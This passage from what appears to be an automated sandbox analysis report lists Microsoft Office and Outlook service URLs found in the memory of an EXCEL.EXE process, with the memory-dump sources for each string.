Source: EXCEL.EXE, 00000000.00000003.957609902.00000000133B4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869052762.00000000133AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.956514368.000000001340C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965787422.00000000133B5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965853409.0000000013410000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812737746.00000000133AF000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://outlook.office365.com
Source: EXCEL.EXE, 00000000.00000002.965714297.0000000013354000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957360365.0000000013354000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://outlook.office365.com/
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957568679.0000000013401000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965837750.0000000013402000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://outlook.office365.com/api/v1.0/me/ActivitiesMBI_SSL
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957568679.0000000013401000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965837750.0000000013402000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.jsonSubstrateOfficeIntelligenceServicehttps:
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.jsonh
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://pages.store.office.com/review/query
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://pages.store.office.com/review/queryrd
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspxm
Source: EXCEL.EXE, 00000000.00000003.957609902.00000000133B4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869052762.00000000133AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965787422.00000000133B5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812737746.00000000133AF000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965819822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp	String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13IdentityServicehttps://identity.
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://powerlift.acompli.net
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://powerlift.acompli.net4
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965819822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp	String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptioneventsMBI_SSLhttps://rpsticket.partnerservices.getmicr
Source: EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://roaming.edog.
Source: EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://settings.outlook.com
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://settings.outlook.comS
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://shell.suite.office.com:1443
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://skyapi.live.net/Activity/
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/workb
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://staging.cortana.ai
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://staging.cortana.aiF
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://staging.cortana.airl
Source: EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://store.office.cn/addinstemplate
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://store.office.cn/addinstemplate?2
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://store.office.de/addinstemplate
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://store.office.de/addinstemplatek2
Source: EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://substrate.office.com
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://substrate.office.com/Todo-Internal.ReadWrite
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory5
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://substrate.office.com/search/api/v2/initn
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://substrate.office.com0
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://substrate.office.comG
Source: EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://substrate.office.comP
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://substrate.office.comU
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://substrate.office.comV
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://substrate.office.comu
